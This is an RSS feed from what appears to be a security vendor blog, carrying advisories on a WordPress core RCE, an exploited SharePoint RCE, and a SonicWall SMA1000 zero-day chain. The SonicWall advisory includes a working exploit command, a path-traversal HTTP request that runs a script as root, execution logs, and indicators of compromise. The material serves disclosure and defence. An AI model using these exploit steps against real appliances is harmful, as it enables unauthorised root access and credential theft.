<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Emergent Threat Response - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Mon, 20 Jul 2026 09:16:43 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/emergent-threat-response/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[CVE-2026-63030: wp2shell a Critical Remote Code Execution Vulnerability in WordPress Core]]></title>
      <description><![CDATA[<p></p><h2 style="direction: ltr;"><span style='font-size: undefined;'>Overview</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 17, 2026, a GitHub Security Advisory was </span><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-63030"><span style='font-size: undefined;'>CVE-2026-63030</span></a><span style='font-size: undefined;'>, a critical unauthenticated remote code execution vulnerability affecting </span><a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/"><span style='font-size: undefined;'>WordPress Core</span></a><span style='font-size: undefined;'>. While the official GitHub security advisory classifies the severity as Critical, the vulnerability has currently been assigned a CVSS score of 7.5. WordPress is one of the most widely deployed content management systems, making vulnerabilities in its core software potentially significant for organizations operating public-facing websites. The vulnerability </span><a href="https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/"><span style='font-size: undefined;'>reportedly allows</span></a><span style='font-size: undefined;'> an unauthenticated attacker to execute code via the WordPress REST API batch endpoint, potentially resulting in complete compromise of the website and its underlying data. No valid account or user interaction is required.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>According to the </span><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'>, the vulnerability affects WordPress versions 6.9.0 through 6.9.4 and versions 7.0.0 through 7.0.1. The issue is fixed in WordPress 6.9.5 and 7.0.2. A fix is also included in WordPress 7.1 Beta 2.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Cloudflare </span><a href="https://blog.cloudflare.com/wordpress-vulnerabilities/"><span style='font-size: undefined;'>reported</span></a><span style='font-size: undefined;'> that the vulnerable code path can be reached when a persistent object cache is not in use. Searchlight Cyber, whose researchers identified the vulnerability, stated that it can be exploited remotely against a default WordPress installation without requiring additional plugins.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Technical exploit details have not yet been published by </span><a href="https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/"><span style='font-size: undefined;'>Searchlight Cyber</span></a><span style='font-size: undefined;'>, as of July 17 5:45 PM Eastern time. At the time of publication, Rapid7 is not aware of publicly confirmed in-the-wild exploitation. Organizations should not interpret the absence of public exploitation reports as an indication of low risk, particularly given the vulnerability’s unauthenticated attack path and the widespread deployment of WordPress; affected WordPress sites should be urgently patched.  Due to WordPress Core being an open-source project and given the current ability of AI models to analyze open-source code, Rapid7 Labs believes it is highly likely that a public PoC will be made available in a short period of time.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating affected WordPress installations should prioritize upgrading immediately. Applying the WordPress-provided update is the most effective way to remediate CVE-2026-63030.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected and fixed versions include:</span></p><p><span style='font-size: undefined;'></span></p><table><colgroup data-width='750'><col style="width:24.26229508196721%"/><col style="width:42.622950819672134%"/><col style="width:33.114754098360656%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'>WordPress branch</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Affected versions</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed version</span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Earlier than 6.9</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Not affected by CVE-2026-63030</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No action required for this CVE</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>6.9</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>6.9.0 through 6.9.4</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>6.9.5</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.0</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.0.0 through 7.0.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.0.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.1 beta</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Affected beta versions were not fully specified</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>7.1 Beta 2</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>WordPress maintainers </span><a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/"><span style='font-size: undefined;'>stated</span></a><span style='font-size: undefined;'> they are forcing updates for affected installations with automatic updates enabled. Administrators should nevertheless verify that each internet-facing WordPress website has successfully upgraded to WordPress 6.9.5, 7.0.2, or another fixed release appropriate for its branch. Workarounds are not recommended at this time.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(15, 71, 97);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-63030 with authenticated vulnerability checks available in the July 20th, 2026 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 17, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-63030-wp2shell-a-critical-remote-code-execution-vulnerability-in-wordpress-core</link>
      <guid isPermaLink="false">bltb79953f01092886f</guid>
      <category><![CDATA[Emerging Threats]]></category>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Fri, 17 Jul 2026 22:23:03 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-58644: Microsoft SharePoint Server Unauthenticated Remote Code Execution Vulnerability Exploited in the Wild]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 14, 2026, Microsoft </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a security advisory addressing </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-58644"><span style='font-size: undefined;'>CVE-2026-58644</span></a><span style='font-size: undefined;'>, a critical remote code execution (RCE) vulnerability affecting on-premises Microsoft SharePoint Server deployments. The vulnerability, which carries a CVSS v3.1 score of 9.8 (Critical), results from the deserialization of untrusted data (</span><a href="https://cwe.mitre.org/data/definitions/502.html"><span style='font-size: undefined;'>CWE-502</span></a><span style='font-size: undefined;'>) and allows an unauthenticated attacker to execute arbitrary code.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft confirmed active exploitation of CVE-2026-58644, and the vulnerability was subsequently added to CISA’s Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>KEV</span></a><span style='font-size: undefined;'>) catalog on July 16, 2026. In parallel, CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> guidance recommending organizations immediately apply Microsoft’s security updates and leverage Microsoft Defender and AMSI detections to identify exploitation attempts.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected products:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Enterprise Server 2016</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server 2019</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server Subscription Edition</span></p></li></ul><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating affected on-premises Microsoft SharePoint Server should prioritize remediation on an emergency basis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft’s recommendations:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Apply the July 14, 2026 security updates for all affected SharePoint versions.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Verify that security updates completed successfully across all SharePoint servers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ensure Antimalware Scan Interface (AMSI) integration is enabled for every SharePoint web application.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Monitor Microsoft Defender and AMSI detections for indicators of attempted exploitation.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Initiate incident response procedures if exploitation artifacts are detected.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft and CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span style='font-size: undefined;'>recommend</span></a><span style='font-size: undefined;'> monitoring for the following security detections associated with observed SharePoint exploitation activity.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AMSI / Microsoft Defender detections:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit:Script/SuspSignoutReqBody.A</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Request body scanning</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>SharePoint Server Subscription Edition</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft reports observed exploitation attempts are blocked by this signature.</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit:Script/ToolPaneAuthBypass.A</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Request header scanning</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Applies to SharePoint Server 2016, SharePoint Server 2019, and Subscription Edition.</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit:Script/ToolPaneAuthBypass</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>At the time of publication, no public IP addresses, domains, URLs, or additional network-based indicators of compromise have been widely disclosed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Administrators should consult Microsoft’s </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span style='font-size: undefined;'>advisory</span></a><span style='font-size: undefined;'> for the most current remediation guidance and update availability.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-58644 with an authenticated vulnerability check available since the July 14 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 17, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-58644-microsoft-sharepoint-server-unauthenticated-remote-code-execution-vulnerability-exploited-in-the-wild</link>
      <guid isPermaLink="false">blt6964e8d39440f50b</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Fri, 17 Jul 2026 18:18:53 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)]]></title>
      <description><![CDATA[<h2>Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 14, 2026, SonicWall </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank"><span style='font-size: undefined;'>published</span></a><span style='font-size: undefined;'> a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15409" target="_blank"><span style='font-size: undefined;'>CVE-2026-15409</span></a><span style='font-size: undefined;'> (CVSS 10.0) and the high-severity code injection vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15410" target="_blank"><span style='font-size: undefined;'>CVE-2026-15410</span></a><span style='font-size: undefined;'>. The advisory urges customers to immediately apply the latest platform hotfix releases.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based </span><span style='font-size: undefined;'><span data-type='inlineCode'>remove_hotfix</span></span><span style='font-size: undefined;'> workflow.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008#EITW" target="_blank"><span style='font-size: undefined;'>noted</span></a><span style='font-size: undefined;'>, and both </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409" target="_blank"><span style='font-size: undefined;'>CVE-2026-15409</span></a><span style='font-size: undefined;'> and </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410" target="_blank"><span style='font-size: undefined;'>CVE-2026-15410</span></a><span style='font-size: undefined;'> have been added to CISA's Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span style='font-size: undefined;'>KEV</span></a><span style='font-size: undefined;'>) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03245</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03387</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03434 (platform-hotfix)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02283</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02624</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02800 (platform-hotfix)</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.</span></p><h2>Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By provided host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploit in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.</span></p><p></p><pre language="html"># python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami && id && pwd && hostname'
Authenticated to couchdb@127.0.0.1
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 =&gt; couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma</pre><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the </span><span style='font-size: undefined;'><span data-type='inlineCode'>remove_hotfix</span></span><span style='font-size: undefined;'> workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as </span><span style='font-size: undefined;'><span data-type='inlineCode'>../../../../var/tmp/privesc</span></span><span style='font-size: undefined;'>. The system executes the script as root and (typically) reboots the appliance immediately after.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:</span></p><p></p><pre language="html">POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&command=rollback&rollbackUpgradeTime=&hotfix=../../../../../tmp/1234.sh&rollbackHotfixTime=</pre><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:</span></p><p></p><pre language="html">2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now</pre><p><span style='color:rgb(15, 71, 97);'></span></p><p><span style='font-size: undefined;'>A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409" target="_blank"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>; a Metasploit module for the chain is in development.</span></p><h2>Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations operating SonicWall SMA1000 appliances should </span><span style='font-size: undefined;'><strong>immediately upgrade</strong></span><span style='font-size: undefined;'> to the latest platform hotfix releases.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed versions are:</span></p><table><colgroup data-width='609'><col style="width:52.052545155993435%"/><col style="width:47.94745484400657%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'>Product</span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'>Fixed Version</span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12.4.3-03453 (platform-hotfix) or later</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>12.5.0-02835 (platform-hotfix) or later</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>There are </span><span style='font-size: undefined;'><strong>no workarounds</strong></span><span style='font-size: undefined;'> available.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Performing a thorough forensic review for indicators of compromise.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Changing user and administrator passwords.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Resetting TOTP tokens following confirmed compromise.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.</span></p><h2>Observed exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.</span></p><h2>Artifacts or evidence sources and IOCs</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:</span></p><h3><span style='font-size: undefined;'>Characteristic behaviors</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Websocket exploit IOC log patterns:</strong></span><span style='font-size: undefined;'> </span><span style='font-size: undefined;'><span data-type='inlineCode'>extraweb_access.log</span></span><span style='font-size: undefined;'> entries containing the strings ("GET" AND "wsproxy" AND "=-3389" AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “localhost” or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Hotfix removal exploit IOC log patterns:</strong></span><span style='font-size: undefined;'> The </span><span style='font-size: undefined;'><span data-type='inlineCode'>ctrl-service.log</span></span><span style='font-size: undefined;'> shows the hotfix-removal utility (</span><span style='font-size: undefined;'><span data-type='inlineCode'>/usr/local/bin/remove_hotfix</span></span><span style='font-size: undefined;'>) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Internet-facing probing:</strong></span><span style='font-size: undefined;'> Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., </span><span style='font-size: undefined;'><span data-type='inlineCode'>/.env</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>/api/sonicos/is-sslvpn-enabled</span></span><span style='font-size: undefined;'>).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Authentication activity:</strong></span><span style='font-size: undefined;'> Authentication-API activity against </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/logon/&lt;session-id&gt;/authenticate</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Sensitive path access:</strong></span><span style='font-size: undefined;'> Access to sensitive appliance paths such as </span><span style='font-size: undefined;'><span data-type='inlineCode'>/tmp/temp.db*</span></span><span style='font-size: undefined;'>, consistent with theft of stored session data.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>AD/Service Account Compromise:</strong></span><span style='font-size: undefined;'> NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance's internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><strong>extraweb_access.log:</strong></span><span style='font-size: undefined;'> Requests to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/login</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/logou</span></span><span style='font-size: undefined;'>t returning HTTP 200, and requests to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/wsproxy</span></span><span style='font-size: undefined;'> containing suspicious host parameters returning HTTP 101.</span></p><h3><span style='font-size: undefined;'>Configuration artifacts</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><span data-type='inlineCode'>/var/lib/unit/conf.json</span></span><span style='font-size: undefined;'> containing routes for </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/login</span></span><span style='font-size: undefined;'> or </span><span style='font-size: undefined;'><span data-type='inlineCode'>/__api__/logout</span></span><span style='font-size: undefined;'>, which are not present in legitimate configurations.</span></p><h3><span style='font-size: undefined;'>Atomic Indicators</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><strong>F.N.S Holdings Limited (ASN - 206092): </strong></span><span style='font-size: undefined;'>The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.131.194.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>45.146.54.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>63.135.161.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>173.239.211.0/24</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>193.37.32[.]179</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>193.37.32[.]214</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>216.73.163[.]151</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>216.73.163[.]158</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Attacker Asset Names:</strong></span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-KRLUI3J</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-IC3C80F</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-5P0TSCP</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>KALI</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>localhost</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow 